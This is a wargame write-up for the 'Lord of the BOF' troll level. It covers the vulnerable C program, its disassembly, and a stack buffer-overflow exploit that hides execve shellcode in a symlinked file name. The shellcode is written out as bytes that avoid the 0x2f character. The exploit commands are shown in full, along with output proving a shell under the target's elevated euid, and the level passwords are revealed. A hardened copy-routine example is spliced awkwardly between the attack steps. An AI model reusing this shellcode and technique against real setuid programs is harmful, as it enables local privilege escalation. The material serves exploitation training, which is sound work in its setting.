1. Intro
2. Code and analysis
2.1 C code
/*
The Lord of the BOF : The Fellowship of the BOF
- troll
- check argc + argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy (missing in the original listing) */
extern char **environ;
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;
    // here is changed
    if(argc != 2){
        printf("argc must be two!\n");
        exit(0);
    }
    // egghunter: wipe every environment string
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    // check the length of argument (48 allowed, but buffer holds only 40)
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    // buffer hunter
    memset(buffer, 0, 40);
    // one more!: wipe argv[1] as well
    memset(argv[1], 0, strlen(argv[1]));
    return 0;
}
2.3. Analysis
2.3.1. Assembler code (key parts)
This time argc must be exactly 2,
0x8048506 <main+6>: cmpl $0x2,0x8(%ebp)
0x804850a <main+10>: je 0x8048523 <main+35>
0x804850c <main+12>: push $0x8048690
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
and, besides the environment variables, the argv[1] region is zeroed as well.
0x8048613 <main+275>: add $0xc,%esp
0x8048616 <main+278>: mov 0xc(%ebp),%eax
0x8048619 <main+281>: add $0x4,%eax
0x804861c <main+284>: mov (%eax),%edx
0x804861e <main+286>: push %edx
0x804861f <main+287>: call 0x80483f0 <strlen>
0x8048624 <main+292>: add $0x4,%esp
0x8048627 <main+295>: mov %eax,%eax
0x8048629 <main+297>: push %eax
0x804862a <main+298>: push $0x0
0x804862c <main+300>: mov 0xc(%ebp),%eax
0x804862f <main+303>: add $0x4,%eax
0x8048632 <main+306>: mov (%eax),%edx
0x8048634 <main+308>: push %edx
0x8048635 <main+309>: call 0x8048430 <memset>
0x804863a <main+314>: add $0xc,%esp
0x804863d <main+317>: leave
0x804863e <main+318>: ret
0x804863f <main+319>: nop
3. Vulnerability check and attack preparation
3.1 Vulnerability
Same as the previous level.
3.2 Attack preparation
This time every region is cleared and only the file name in argv[0] survives; since the stack region still has to be used, the shellcode has to be placed in the file name through a symbolic link.
Searching the internet for such a shellcode turns up the following.
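For comparison, an added example (not code from the wargame or from this post): the copy below derives its bound from the destination size instead of troll.c's fixed 48, so the 41 to 48 byte arguments that troll.c still lets through are rejected. The names copy_arg_checked and troll_length_check_accepts are my own.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 40   /* same 40-byte buffer as troll.c */

/*
 * Hardened replacement for the strcpy in troll.c (added example).
 * troll.c only rejects arguments longer than 48 bytes, but the
 * destination holds 40, so 41..48-byte inputs still overflow.
 * Returns 0 on success, -1 if the argument would not fit.
 */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)          /* need room for the terminating NUL */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Reproduces troll.c's own length test for comparison: 1 = accepted. */
int troll_length_check_accepts(const char *src)
{
    return strlen(src) > 48 ? 0 : 1;
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc != 2) {
        fprintf(stderr, "usage: %s <argument>\n", argv[0]);
        return 1;
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```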
\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Let's make a symbolic link with this as the file name and try it.
[orge@localhost orge]$ ln -s trola `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
trola
troll
troll.c
4. Exploit
It can be handled simply as shown below.
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) groups=507(orge)
bash$ my-pass
euid = 507
timewalker
[orge@localhost orge]$ ln -s troll `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xbc\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¼ÿÿ¿
bash$ id
uid=507(orge) gid=507(orge) euid=508(troll) egid=508(troll) groups=507(orge)
bash$ my-pass
euid = 508
aspirin
Of course, the shellcode that runs my-pass, which I have been using so far, could be modified as well... but I can't be bothered........
The principle is simply to write the assembler code so that it builds the byte 0x2f from something like 0x2e + 0x01 instead of using 0x2f directly.